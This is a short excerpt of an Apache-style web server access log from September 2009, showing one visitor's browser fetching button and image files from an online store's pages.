88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:50 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
